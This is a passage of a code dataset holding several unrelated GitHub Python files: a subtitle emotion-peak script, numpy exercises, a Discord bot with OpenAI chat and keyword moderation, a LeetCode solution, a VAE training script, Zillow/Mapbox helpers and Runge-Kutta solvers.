The results are saved in a new csv file.\r\n :param mypath: path to the directory that contains the files to iterate over\r\n \"\"\"\r\n subs_files_lst = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n res = []\r\n for file_name in subs_files_lst:\r\n with open(file=mypath+\"/\"+file_name, mode=\"r\", encoding=\"utf8\") as subtitle_file:\r\n try:\r\n # read the file:\r\n csv_reader = list(csv.reader(subtitle_file))\r\n percent_lst = csv_reader[0]\r\n rank_lst = csv_reader[1]\r\n count_lst = count_list_creator.count_emotional_peaks(percent_lst, rank_lst)\r\n if count_lst == -1:\r\n print(file_name + \" was not included\")\r\n continue\r\n res.append(count_lst)\r\n except Exception:\r\n print(file_name + \" was not included\")\r\n continue\r\n\r\n # write the results to a csv file:\r\n with open(mypath + \"All Peaks.csv\", \"w\", newline=\"\") as outfile:\r\n writer = csv.writer(outfile)\r\n for line in res:\r\n writer.writerow(line)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # call this function with (\"HollywoodSubs\", \"HollywoodRanks\") or (\"BollywoodSubs\",\r\n # \"BollywoodRanks\") to parse all subtitle files and create a file of ranks for each\r\n # one:\r\n parse_subs(\"BollywoodSubs\", \"BollywoodRanks\")\r\n\r\n # after creating rank files, call this function with \"HollywoodRanks\" or\r\n # \"BollywoodRanks\" to sum the peaks of every movie:\r\n sum_peaks(\"HollywoodRanks\")\r\n\r\n","repo_name":"josp1234/HollyBolly","sub_path":"Milestone 2/bolly_holly_main.py","file_name":"bolly_holly_main.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26126511148","text":"import numpy as np #importing the numpy module into the short name np\r\n\r\na = np.array([[1,2,3], [4,5,6], [7,8,9]]) #creates a 3x3 matrix\r\nb = a[2,:] #since python starts from a zero index, this will set be equal to the 3rd row of the a matix\r\nc = a.reshape(-1) #c will contain a single row of all the unchanged elements of matrix a because we specified an unknown\r\n #number of rows\r\nf = np.random.randn(5,1) #create a 5x1 matrix filled with random values as per standard normal distribution.\r\ng = f[f>0] #g will only be a 3x1 matrix because it will only store values greater than 0 from f's matrix\r\nx = np.zeros(10)+0.5 #x will be an array of 10 \"padded\" zeroes that also have 0.5 added to each element (10 entries\r\n # of 0.5) \r\ny = 0.5*np.ones(len(x)) #y will be an array the same length as x but padded with 1s instead. 
Each element is then\r\n # multiplied by 0.5\r\nz = x + y #matrix addition of x and y are stored in z (An array of 10 1s)\r\na = np.arange(1,100) #creates an array of values from 1 to 99 with even spacing with the default step size of 1\r\nb = a[::-1] #Starting from the back of the array a, copy all values into b\r\nc = np.random.permutation(10) #creates a randomly permuted array with a range of 10\r\n\r\n","repo_name":"jrsavage29/Computer-Vision","sub_path":"HW1/HW1_Problem5a.py","file_name":"HW1_Problem5a.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41382461472","text":"import discord\nimport logging\nfrom discord.ext import commands\nfrom typing import Any, Dict, List, Optional, Union\nfrom wishing_star.Exceptions import FrequentRequestRateException\nfrom wishing_star.OpenAIHandler import OpenAIHandler\nfrom wishing_star.YGOCardQueryHandler import YGOCardQueryHandler\n\n\nclass WishingStar(commands.Bot):\n \"\"\"\n This class is a derived class of discord.commands.Bot.\n\n This is the top level client that handles all the user inputs and backend\n jobs.\n \"\"\"\n\n keyword_openai_handler: str = \"Jirachi\"\n keyword_ygo_query: str = \"?ygo \"\n\n def __init__(\n self,\n command_prefix: Union[str, Any],\n logger: logging.Logger,\n credential: Dict[str, Any],\n config: Dict[str, Any],\n **options: Any,\n ):\n \"\"\"\n Initializes the client with customized data members.\n\n :param self\n :param command_prefix: The condition when the bot will be triggered by a\n command.\n :param logger: Global logging handler.\n :param credential: A dictionary that contains necessary credential keys.\n :param config: A dictionary that contains customized settings\n :param options: Other options to initialize the low level bot.\n \"\"\"\n super().__init__(command_prefix, **options)\n self.logger: logging.Logger = logger\n self.discord_key: str = credential[\"discord_key\"]\n self.openai_handler: OpenAIHandler = OpenAIHandler(credential[\"openai_key\"], logger)\n self.ygo_query_handler: YGOCardQueryHandler = YGOCardQueryHandler(logger)\n self.keyword_blacklist: List[str] = []\n if \"keyword_blacklist\" in config:\n self.keyword_blacklist = config[\"keyword_blacklist\"]\n for keyword in self.keyword_blacklist:\n self.logger.info(f\"Blacklist Keyword added: {keyword}\")\n\n def serve(self) -> None:\n \"\"\"\n Wrapper for self.run.\n\n :param self\n \"\"\"\n self.run(self.discord_key)\n\n def keyword_blacklist_detection(self, message: discord.Message) -> bool:\n \"\"\"\n Checks whether the message contains any of the keyword that should be\n blocked. The keyword list is specified in `keyword_blacklist`.\n\n :param self\n :param message: Message to check. :return True if the message contains\n any one of the keyword.\n \"\"\"\n content: str = message.content\n content = content.lower()\n for keyword in self.keyword_blacklist:\n if keyword in content:\n return True\n return False\n\n async def on_ready(self) -> None:\n assert None is not self.user\n self.logger.info(f\"Logged in as <{self.user}> ID: <{self.user.id}>\")\n\n async def process_jirachi_chatting(self, message: discord.Message, src_id: int) -> None:\n \"\"\"\n Process the input chat by redirecting the message to the OpenAI backend.\n\n :param self\n :param message: Discord message that contains the new chat.\n :param src_id: The Discord Id of the message owner. 
:raise\n FrequentRequestRateException: The chat is too frequent.\n \"\"\"\n try:\n chat_content: str = message.content\n chat_content = chat_content[chat_content.index(\" \") + 1 :]\n response: str = self.openai_handler.chat(chat_content, src_id)\n end_pos: int = 0\n response_len: int = len(response)\n while end_pos < response_len:\n start_pos: int = end_pos\n end_pos = min(end_pos + 1800, response_len)\n await message.reply(response[start_pos:end_pos], mention_author=True)\n except FrequentRequestRateException:\n await message.reply(\n \"T.T Jirachi gets too many questions and need to sleep for a while\",\n mention_author=True,\n )\n except Exception as e:\n self.logger.warning(e)\n\n async def on_message(self, message: discord.Message) -> None:\n \"\"\"\n Override Message handler.\n\n :param self\n :param message: Discord message received.\n \"\"\"\n assert None is not self.user\n src_id: Optional[int] = message.author.id\n\n if None is src_id:\n self.logger.warning(f\"On message: Author id not found: {str(message.author)}\")\n return\n\n if src_id == self.user.id:\n return\n\n if self.keyword_blacklist_detection(message):\n await message.delete()\n return\n\n if self.user in message.mentions:\n await self.process_jirachi_chatting(message, src_id)\n return\n\n await self.process_commands(message)\n\n\nclass WishingStarCog(commands.Cog):\n \"\"\"\n This class contains basic Wishing Star commands.\n \"\"\"\n\n def __init__(self, wishing_star: WishingStar):\n \"\"\"\n Initializes with the wishing star bot.\n\n :param self\n :param wishing_star: An instance of WishingStar bot.\n \"\"\"\n self.ws: WishingStar = wishing_star\n self.logger: logging.Logger = wishing_star.logger\n\n @commands.command()\n async def ygo(\n self, context: commands.Context, search_query: Optional[str] # type: ignore\n ) -> None:\n \"\"\"\n Processes YGO search query.\n\n :param self\n :param context: Context input from the users.\n :param search_query: Search input. It is possible to be None.\n \"\"\"\n try:\n if None is search_query or 0 == len(search_query):\n await context.reply(\"Empty Query Received.\", mention_author=True)\n return\n result_count: int = 0\n for result in self.ws.ygo_query_handler.search_query(search_query):\n await context.reply(result, mention_author=True)\n result_count += 1\n if 0 == result_count:\n await context.reply(\"No result found.\", mention_author=True)\n else:\n await context.reply(\n f\"Query complete. 
Total results found: {result_count}\", mention_author=True\n )\n except Exception as e:\n self.logger.warning(e)\n","repo_name":"LinZhihao-723/wishing-star","sub_path":"src/wishing_star/WishingStarClient.py","file_name":"WishingStarClient.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31981344654","text":"import collections\n\nclass Solution:\n def checkInclusion(self, pattern: str, s2: str) -> bool:\n windowSTART, matched = 0, 0\n char_frequency = collections.Counter(pattern)\n\n # our goal is to match all the characters from the 'char_frequency' with the current window\n # try to extend the range [window_start, window_end]\n for windowEND in range(len(s2)):\n\n right_char = s2[windowEND]\n\n if right_char in char_frequency:\n\n # decrement the frequency of matched character\n char_frequency[right_char] -= 1\n\n # THIS MEAN WE HAVE SUCCESSFULLY MATCHED ALL OF THIS LETTER\n # IF THE PATTERN HAD 2 'A'S, THEN THIS WOULD MEAN THAT WE HAVE 2 'A'S IN OUR WINDOW\n if char_frequency[right_char] == 0: matched += 1\n\n if matched == len(char_frequency):\n return True\n\n # shrink the window by one character because WE WILL DEFINETLY\n # NOT HAVE THE PERMUTATION IN OUR WINDOW IF OUR WINDOW IS LONGER\n # THAN THE PERMUTATION ITSELF\n if windowEND - windowSTART + 1 == len(pattern):\n left_char = s2[windowSTART]\n windowSTART += 1\n \n if left_char in char_frequency:\n if char_frequency[left_char] == 0:\n matched -= 1\n \n char_frequency[left_char] += 1\n\n return False\n \n \n\n \n \n \n\n\ndef main():\n print('Permutation exist: ' + str(find_permutation(\"oidbcaf\", \"abc\")))\n print('Permutation exist: ' + str(find_permutation(\"odicf\", \"dc\")))\n print('Permutation exist: ' + str(find_permutation(\"bcdxabcdy\", \"bcdyabcdx\")))\n print('Permutation exist: ' + str(find_permutation(\"aaacb\", \"abc\")))\n\nmain()\n","repo_name":"bailey8/Algorithms-and-Data-Structures","sub_path":"LEETCODELEETCODE/Sliding Window, 2 ptr, array/Sliding Window/permutationInString.py","file_name":"permutationInString.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2024732717","text":"import os\nimport sys\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport configargparse\nfrom tensorflow.python.ops.numpy_ops import np_config\nnp_config.enable_numpy_behavior()\nfrom utils import utils\nfrom train import train\nfrom eval import evaluate\nfrom generate import generate\nfrom reconstruct import reconstruct_img\n# from hard_code_model import VariationalAutoencoder\nfrom model import VariationalAutoencoder\nimport data_io\n\nimport numpy as np\nimport tensorflow as tf\n\ndef main(args):\n\n strategy = tf.distribute.MirroredStrategy()\n batch_size = args.batch_size\n global_batch_size = batch_size * strategy.num_replicas_in_sync\n print(f\"global batch size: {global_batch_size}\")\n print(f'Number of devices: {strategy.num_replicas_in_sync}')\n\n with strategy.scope():\n\n dataio = data_io.Data(args.data_path, global_batch_size, args.tile_size)\n\n iterator = iter(strategy.experimental_distribute_dataset(\n dataio.load_data(args.dataset))\n )\n\n steps_per_execution = dataio.data_dim[0] // global_batch_size\n\n # sys.exit()\n\n # Model Initialization\n in_shape = list(dataio.data_dim[1:])\n model_arch = utils.get_model_arch(args.model_arch)\n print(f\"model_arch: {args.model_arch}\")\n\n vae = 
VariationalAutoencoder(args, model_arch, global_batch_size, in_shape)\n print(f\"is using se: {vae.use_se}\\n\")\n vae.model().summary()\n\n # Set up for training, evaluation, or generation\n model_path = args.model_path\n print(f\"\\nlogging information to: {model_path}\\n\")\n \n resume_checkpoint={}\n if args.resume or args.generate:\n weight_path = model_path + '/checkpoints/' + f'model_{args.iter:06d}'\n vae.load_weights(weight_path)\n if args.resume:\n print(f\"Resume trainig...\")\n resume_checkpoint['resume_epoch'] = args.iter\n print(resume_checkpoint)\n print(f\"Model weights successfully loaded.\")\n \n # sys.exit()\n\n # Training, Generating, or Evaluating the model\n if args.generate:\n print(f\"Generating images...\")\n path_img_output = os.path.join(model_path, 'reconstruction_images') \n if (args.dataset == \"mnist\"):\n generate(vae, iterator, path_img_output)\n else:\n reconstruct_img(vae, iterator, dataio, is_plotting=True,\n img_folder=path_img_output, prefix_name='')\n else:\n if args.eval:\n print(\"Evaluation...\")\n evaluate(vae, iterator, dataio, model_path=model_path, \n save_encoding=args.save_encoding)\n else:\n # Training parameters\n epochs = args.epochs\n lr = args.learning_rate\n lr_min = args.learning_rate_min\n train_portion = args.train_portion\n \n\n # optimizer\n # decay_steps = int(dataio.data_dim[0] * train_portion) * (epochs/4)\n decay_steps = int(steps_per_execution*0.9)\n lr_schedule = tf.keras.optimizers.schedules.CosineDecayRestarts(\n lr, first_decay_steps=decay_steps,\n t_mul=2, m_mul=0.75, alpha=lr_min)\n optimizer = tf.keras.optimizers.Adamax(learning_rate=lr_schedule)\n\n train(vae, iterator, epochs=epochs, optimizer=optimizer, train_portion=train_portion,\n model_dir=model_path, batch_size=global_batch_size,\n steps_per_execution=steps_per_execution,\n kl_anneal_portion=args.kl_anneal_portion,\n epochs_til_ckpt=args.epochs_til_ckpt,\n epochs_til_summary=args.epochs_til_summary,\n resume_checkpoint=resume_checkpoint, strategy=strategy)\n\n\nif __name__ == '__main__':\n parser = configargparse.ArgumentParser()\n # data\n parser.add_argument('--dataset', type=str, default='mnist',\n choices=['mnist', 'cesm', 'isabel'],\n help='which dataset to use, default=\"mnist')\n parser.add_argument('--data_path', type=str, default='./data',\n help='location of the data corpus')\n parser.add_argument('--tile_size', type=int, default=64,\n help=\"tile size after partitioning scientific dataset\")\n # Genral training options\n parser.add_argument('--eval', action='store_true', default=False,\n help=\"run evaluation on testing dataset\")\n parser.add_argument('--save_encoding', action='store_true', default=False,\n help=\"save encoding vectors during eval\")\n parser.add_argument('--generate', action='store_true', default=False,\n help=\"run generation\")\n parser.add_argument('--model_path', default=\"./model_output/bivae\",\n help=\"Path to model folder\")\n parser.add_argument('--train_portion', type=float, default=0.95,\n help=\"train portion after spliting the original dataset\")\n # logging options\n # parser.add_argument('--experiment_name', type=str, required=True,\n # help='path to directory where checkpoints & tensorboard events will be saved.')\n parser.add_argument('--epochs_til_ckpt', type=int, default=5,\n help=\"Epochs until checkpoint is saved\")\n parser.add_argument('--epochs_til_summary', type=int, default=1,\n help=\"Number of iterations until tensorboard summary is saved\")\n parser.add_argument('--logging_root', type=str, 
default='./logs',\n help=\"root for logging\")\n # optimization\n parser.add_argument('--batch_size', type=int, default=32, \n help=\"batch size. default=32\")\n parser.add_argument('--learning_rate', type=float, default=1e-3,\n help='init learning rate')\n parser.add_argument('--learning_rate_min', type=float, default=5e-5,\n help='min learning rate')\n parser.add_argument('--weight_decay_norm', type=float, default=0.,\n help='The lambda parameter for spectral regularization.')\n parser.add_argument('--weight_decay_norm_init', type=float, default=10.,\n help='The initial lambda parameter')\n parser.add_argument('--weight_decay_norm_anneal', action='store_true', default=False,\n help='This flag enables annealing the lambda coefficient from '\n '--weight_decay_norm_init to --weight_decay_norm.')\n parser.add_argument('--epochs', type=int, default=100,\n help='num of training epochs')\n parser.add_argument('--warmup_epochs', type=int, default=10,\n help='num of training epochs in which lr is warmed up')\n parser.add_argument('--model_arch', type=str, default='res_wnelu',\n help='which model architecture to use')\n # KL annealing\n parser.add_argument('--kl_anneal_portion', type=float, default=0.4,\n help='The portions epochs that KL is annealed')\n # Flow params\n parser.add_argument('--num_nf', type=int, default=1,\n help='The number of normalizing flow cells per groups. Set this to zero to disable flows.')\n # latent variables\n parser.add_argument('--num_channels_of_latent', type=int, default=1,\n help='number of channels of latent variables')\n # Initial channel\n parser.add_argument('--num_initial_channel', type=int, default=16,\n help='number of channels in pre-enc and post-dec')\n # Share parameter of preprocess and post-process blocks\n parser.add_argument('--num_process_blocks', type=int, default=1,\n help='number of preprocessing and post-processing blocks')\n # Preprocess cell\n parser.add_argument('--num_preprocess_cells', type=int, default=2,\n help='number of cells per proprocess block')\n # Encoder and Decoder Tower\n parser.add_argument('--num_scales', type=int, default=2,\n help='the number of scales')\n parser.add_argument('--num_groups_per_scale', type=int, default=1,\n help='number of groups per scale')\n parser.add_argument('--is_adaptive', action='store_true', default=False,\n help='Settings this to true will set different number of groups per scale.')\n parser.add_argument('--min_groups_per_scale', type=int, default=1,\n help='the minimum number of groups per scale.')\n # encoder parameters\n parser.add_argument('--num_cell_per_group_enc', type=int, default=1,\n help='number of cells per group in encoder')\n # decoder parameters\n parser.add_argument('--num_cell_per_group_dec', type=int, default=1,\n help='number of cell per group in decoder')\n # Post-process cell\n parser.add_argument('--num_postprocess_cells', type=int, default=2,\n help='number of cells per post-process block')\n # Squeeze-and-Excitation\n parser.add_argument('--use_se', action='store_true', default=False,\n help='This flag enables squeeze and excitation.')\n # Resume\n parser.add_argument('--resume', action='store_true', default=False,\n help='This flag enables training from an existing checkpoint.')\n parser.add_argument('--iter', type=int, default=0,\n help='resume iteration')\n args = parser.parse_args()\n\n if (args.generate and (args.model_path is None)):\n parser.error('The --generate argument requires the --model_path')\n\n if (args.resume and args.iter is None):\n parser.error('The 
--resume argument requires the --iter')\n\n for k, v in args.__dict__.items():\n print(f\"{k}: {v}\")\n print()\n \n devices = tf.config.list_physical_devices()\n print(devices)\n print(f\"Tennsorflow version: {tf.__version__}\\n\")\n\n main(args=args)","repo_name":"hieutrungle/BiVAE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20873931065","text":"##############################################################################\n# Helper functions \n##############################################################################\nimport math\nimport random\nimport struct\n\nfrom flask import session\nimport usaddress\n\n# ZILLOW\n\n### DETAILS PER HOUSE ###\n# http://www.zillow.com/howto/api/GetDeepSearchResults.htm\n# input: address and zip\n# output: lattitude and longitude (could then be inputed into PV WATTS)\n# valutation range (high and low)\n# home value index -- avg home value in neighborhood?\n# ZPID = a zillow id (per house). used for the other zillow APIs.\n# Tax assessment,Yearbuilt,lotSizeSqFt,finishedSqFt,Bedrooms\n# *** FIPScounty *** = matches county codes in maps, census data, etc\n\ndef getText(nodelist):\n rc = []\n for node in nodelist:\n if node.nodeType == node.TEXT_NODE:\n rc.append(node.data)\n return ''.join(rc)\n\n\ndef handleTok(tokenlist):\n texts = \"\"\n for token in tokenlist:\n texts += \" \"+ getText(token.childNodes)\n return texts\n\n\n#Parse the search text into address components\ndef create_address_url(raw_address_text):\n raw_address_parsed = usaddress.tag(raw_address_text)\n address_ordered_dict = raw_address_parsed[0]\n \n address_keys = ['AddressNumber','StreetName','StreetNamePostType','OccupancyType','OccupancyIdentifier']\n address_string_list=[]\n for key in address_keys:\n if address_ordered_dict.get(key) is not None:\n address_string_list.append(address_ordered_dict[key])\n address_string = ' '.join(address_string_list)\n address_url_encode = address_string.replace(' ','+').strip()\n \n citystatezip_string = address_ordered_dict.get('PlaceName','')\n citystatezip_string += '%2C ' + address_ordered_dict.get('StateName','')\n citystatezip_string += ' ' + address_ordered_dict.get('ZipCode','')\n citystatezip_url_encode = citystatezip_string.strip().replace(' ','+')\n\n address_for_walkscore = address_url_encode + \",\" + citystatezip_url_encode\n\n return address_url_encode, citystatezip_url_encode, address_for_walkscore\n\n\n##MAKE LIST OF POSSIBLE MARKER COLORS##\ndef make_marker_colors():\n\n rbg_range = range(50, 251, 50)\n marker_rgb_list = [(r, g, b) for r in rbg_range for b in rbg_range for g in rbg_range]\n\n random.shuffle(marker_rgb_list)\n\n marker_hex_list = []\n\n for rgb_tuple in marker_rgb_list:\n hex_color_string = struct.pack('BBB', *rgb_tuple).encode('hex')\n marker_hex_list.append(hex_color_string)\n\n return marker_rgb_list, marker_hex_list \n\nRGB_TUPLES, HEX_COLOR_STRINGS = make_marker_colors()\n\n\n#Make the string for the default map API call\ndef make_marker_text(lonlat_tuples_list):\n \"\"\"Parse and join the strings that go in the mapbox api call\"\"\"\n used_color_map = session.get('used_color_map', {})\n marker_text_list = []\n # color = '84638F'\n name = 'pin-m'\n \n for index, lonlat_tuple in enumerate(lonlat_tuples_list):\n label = \"building\"\n zpid, lon, lat = lonlat_tuple\n \n color = used_color_map[str(zpid)]['hex']\n marker_text = name + '-' + label + '+' + color 
+ '(' + str(lon) + ',' + str(lat) + ')'\n marker_text_list.append(marker_text)\n\n return marker_text_list\n\n\n#Determine optimal zoom level\ndef get_zoom_level(lat_max, lat_min, lon_max, lon_min, imgheight, imgwidth):\n \"\"\"Figure out the optimal zoom level,\n given the NE, SW bounds(max(lat, lon); min(lat, lon)) \n from the list of lon, lat tuples.\"\"\"\n\n world_dim = { 'height': 256, 'width': 256 } #always 256 px\n zoom_max = 21 #max zoom for Mapbox\n\n\n def lat_radius(lat):\n sin = math.sin(lat * math.pi / 180);\n rad_x2 = math.log((1 + sin) / (1 - sin)) / 2\n return max(min(rad_x2, math.pi), -math.pi) / 2\n\n def zoom(map_px, world_px, fraction):\n return math.floor(math.log(map_px / world_px / fraction) / math.log(2))\n\n # northeast = (lat_max, lon_max)\n # southwest = (lat_min, lon_min)\n\n lat_fraction = (lat_radius(lat_max) - lat_radius(lat_min)) / math.pi\n \n lon_diff = lon_max - lon_min\n if (lon_diff < 0):\n lon_fraction = (lon_diff + 360) / 360\n else:\n lon_fraction = (lon_diff / 360)\n\n lat_zoom = zoom(imgheight, world_dim['height'], lat_fraction)\n lon_zoom = zoom(imgwidth, world_dim['width'], lon_fraction)\n \n zoom = min([lat_zoom, lon_zoom, zoom_max])\n\n return zoom","repo_name":"antoniawang/HomespectorGadget","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31324858232","text":"import numpy as np\nfrom dataclasses import dataclass\n\na = np.array([[0,0,0],[1,2,3],[4,6,5]])\nprint(a)\nindex = np.argmax(a[1:,1:])\nprint(index)\nindx = np.unravel_index(np.argmax(a[1:,1:]),a[1:,1:].shape)\nprint(np.argmax(a))\nprint(np.unravel_index(np.argmax(a[1:,1:]),a[1:,1:].shape))\nprint(a[1:,1:][indx])\n\n\n# Structure for automatic step-size implementation statistics\n@dataclass\nclass stats:\n nsteps: int = 0 # Total number of steps --- Общее число шагов\n nrej: int = 0 # Number of rejected steps --- Число отброшенных шагов\n trej: float = 0 # Rejected steps times --- Абсциссы отброшенных шагов\n hrej: float = 0 # Rejected steps sizes --- Длины отброшенных шагов\n nfevals: int = 0 # Right-hand sides calculations --- Количество оценок правйо части (вычислений функции f)\n\n\n# Constant step Runge--Kutta solution\ndef rkconst(f, t0: float, y0: float, tfin: float, N: int, method, xi=0):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: initial point --- начальная точка\n tfin: end time point --- конечная точка по времени\n N: number of constant steps to make --- число шагов на интервал решения\n method: reference to the method scheme for one step --- ссылка на метод для решения\n xi: the parameter for rk2step function --- параметр в методе второго порядка\n \"\"\"\n\n h = (tfin - t0) / N # step-size --- длина шага\n d = len(y0) # equations number --- число уравнений в системе\n\n # T --- times in the mesh points --- абсциссы точек сетки\n # Y --- values in the mesh points --- решение в точках сетки\n\n T = np.zeros(N + 1)\n Y = np.zeros((N + 1, d))\n\n T[0] = t0\n Y[0] = y0\n\n for i in range(N):\n new_y = method(f, T[i], Y[i], h, xi)\n new_t = T[i] + h\n T[i+1] = new_t\n Y[i+1] = new_y\n\n return T, Y.transpose()\n\n\n# Second order RK method step --- Один шаг методом второго порядка\ndef rk2step(f, t0, y0, h, xi):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: initial point of the step --- начальная точка шага\n h: step-size --- длина шага\n xi: 
","repo_name":"antoniawang/HomespectorGadget","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"31324858232","text":"import numpy as np\nfrom dataclasses import dataclass\n\n# Scratch: find the argmax of a subarray and map the flat index back to 2-D\na = np.array([[0, 0, 0], [1, 2, 3], [4, 6, 5]])\nprint(a)\nindex = np.argmax(a[1:, 1:])\nprint(index)\nindx = np.unravel_index(np.argmax(a[1:, 1:]), a[1:, 1:].shape)\nprint(np.argmax(a))\nprint(np.unravel_index(np.argmax(a[1:, 1:]), a[1:, 1:].shape))\nprint(a[1:, 1:][indx])\n\n\n# Structure for automatic step-size implementation statistics\n@dataclass\nclass stats:\n    nsteps: int = 0   # total number of steps\n    nrej: int = 0     # number of rejected steps\n    trej: float = 0   # abscissae of rejected steps\n    hrej: float = 0   # sizes of rejected steps\n    nfevals: int = 0  # number of right-hand-side evaluations (calls to f)\n\n\n# Constant step Runge--Kutta solution\ndef rkconst(f, t0: float, y0: float, tfin: float, N: int, method, xi=0):\n    \"\"\"\n    f: right-hand side of the equation\n    t0, y0: initial point\n    tfin: end time point\n    N: number of constant steps over the solution interval\n    method: reference to the method scheme for one step\n    xi: the parameter for the rk2step scheme (ignored by the other schemes)\n    \"\"\"\n\n    h = (tfin - t0) / N  # step-size\n    d = len(y0)  # number of equations in the system\n\n    # T --- times at the mesh points\n    # Y --- solution values at the mesh points\n    T = np.zeros(N + 1)\n    Y = np.zeros((N + 1, d))\n\n    T[0] = t0\n    Y[0] = y0\n\n    for i in range(N):\n        Y[i + 1] = method(f, T[i], Y[i], h, xi)\n        T[i + 1] = T[i] + h\n\n    return T, Y.transpose()\n\n\n# Second order RK method step\ndef rk2step(f, t0, y0, h, xi):\n    \"\"\"\n    f: right-hand side of the equation\n    t0, y0: initial point of the step\n    h: step-size\n    xi: free parameter of the one-parameter second-order family\n\n    Butcher tableau:\n        xi | xi\n        ---+------------------------\n           | 1 - 1/(2 xi)   1/(2 xi)\n    \"\"\"\n    c2 = xi\n    a21 = xi\n\n    b2 = 0.5 / c2\n    b1 = 1 - b2\n\n    k1 = f(t0, y0)\n    k2 = f(t0 + c2 * h, y0 + a21 * h * k1)\n\n    y1 = y0 + b1 * h * k1 + b2 * h * k2\n\n    return y1  # value at t0 + h\n\n\n# Third order RK method step\ndef rk3step(f, t0, y0, h, xi):\n    \"\"\"\n    f: right-hand side of the equation\n    t0, y0: initial point of the step\n    h: step-size\n    xi: NOT USED HERE (added for compatibility with rk2step)\n\n    Butcher tableau:\n        0   |\n        1/3 | 1/3\n        2/3 | 0    2/3\n        ----+---------------\n            | 1/4  0    3/4\n    \"\"\"\n    c2 = 1/3\n    c3 = 2/3\n\n    a21 = 1/3\n    a32 = 2/3\n\n    b1 = 1/4\n    b3 = 3/4\n\n    t1 = t0 + c2 * h\n    t2 = t0 + c3 * h\n\n    k1 = f(t0, y0)\n    k2 = f(t1, y0 + a21 * h * k1)\n    k3 = f(t2, y0 + a32 * h * k2)\n\n    y1 = y0 + b1 * h * k1 + b3 * h * k3\n\n    return y1  # value at t0 + h\n\n\n# Fourth order RK method step\ndef rk4step(f, t0, y0, h, xi):\n    \"\"\"\n    f: right-hand side of the equation\n    t0, y0: initial point of the step\n    h: step-size\n    xi: NOT USED HERE (added for compatibility with rk2step)\n\n    Butcher tableau (the classic RK4 scheme):\n        0   |\n        1/2 | 1/2\n        1/2 | 0    1/2\n        1   | 0    0    1\n        ----+--------------------\n            | 1/6  1/3  1/3  1/6\n    \"\"\"\n    c2 = 1 / 2\n    c3 = 1 / 2\n    c4 = 1\n\n    a21 = 1 / 2\n    a32 = 1 / 2\n    a43 = 1\n\n    b1 = 1 / 6\n    b2 = 1 / 3\n    b3 = 1 / 3\n    b4 = 1 / 6\n\n    t1 = t0 + c2 * h\n    t2 = t0 + c3 * h\n    t3 = t0 + c4 * h\n\n    k1 = f(t0, y0)\n    k2 = f(t1, y0 + a21 * h * k1)\n    k3 = f(t2, y0 + a32 * h * k2)\n    k4 = f(t3, y0 + a43 * h * k3)\n\n    y1 = y0 + b1 * h * k1 + b2 * h * k2 + b3 * h * k3 + b4 * h * k4\n\n    return y1  # value at t0 + h\n
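\n\n# Illustrative sanity check (added, not part of the original file): one step of\n# each fixed-step scheme on y' = y, y(0) = 1 with h = 0.1. The results should\n# approach exp(0.1) ~= 1.10517 as the order grows; xi = 0.5 turns rk2step into\n# the classical midpoint method.\nfor _step in (rk2step, rk3step, rk4step):\n    print(_step.__name__, _step(lambda t, y: y, 0.0, np.array([1.0]), 0.1, 0.5))\n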
\n\n# Embedded RK3(2) method with FSAL: autostep (similar to ode23 in matlab)\ndef rk32f(f, t0: float, y0, tfin: float, hmax: float, tol: float):\n    \"\"\"\n    f: right-hand side of the equation\n    t0, y0: initial point\n    tfin: end time point\n    hmax: maximal step-size\n    tol: local absolute tolerance\n    \"\"\"\n    st = stats()  # per-run statistics on steps and evaluations\n\n    # initial step-size\n    p = 3  # order of the main method\n    a = max(np.abs(t0), np.abs(tfin))\n    b = np.linalg.norm(f(t0, y0))\n    st.nfevals = 1\n    delta = np.power(1 / a, p + 1) + np.power(b, p + 1)\n    h = np.power(tol / delta, 1 / (p + 1))\n    if h > hmax:\n        h = hmax\n\n    # T --- times at the mesh points\n    # Y --- solution values at the mesh points\n    T = [t0]\n    Y = [y0]\n    # bounds and safety factor for the step-size controller\n    fac_min = 0.5\n    fac_max = 3\n    factor = 0.9\n\n    new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n    st.nfevals += 3\n\n    while np.linalg.norm(error) > tol:\n        st.nrej += 1\n        h = h / 2\n        new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n        st.nfevals += 3  # a rejected-and-retried step still costs 3 evaluations\n\n    Y.append(new_y)\n    T.append(T[-1] + h)\n\n    while T[-1] + h < tfin:\n\n        tmp = np.power(tol / np.linalg.norm(error), 1 / p)\n        h = h * max(fac_min, min(fac_max, factor * tmp))\n        new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n        st.nfevals += 3\n        while np.linalg.norm(error) > tol:\n            st.nrej += 1\n            h /= 2\n            new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n            st.nfevals += 3  # count retried steps as well\n        Y.append(new_y)\n        T.append(T[-1] + h)\n\n    # last step: forced to land exactly on tfin (no error control here)\n    h = tfin - T[-1]\n    new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n    st.nfevals += 3\n    Y.append(new_y)\n    T.append(tfin)\n\n    st.nsteps += len(T) - 1\n\n    return np.array(T), np.array(Y).transpose(), st\n\n\n# Embedded RK3(2) method with FSAL: one step (similar to ode23 in 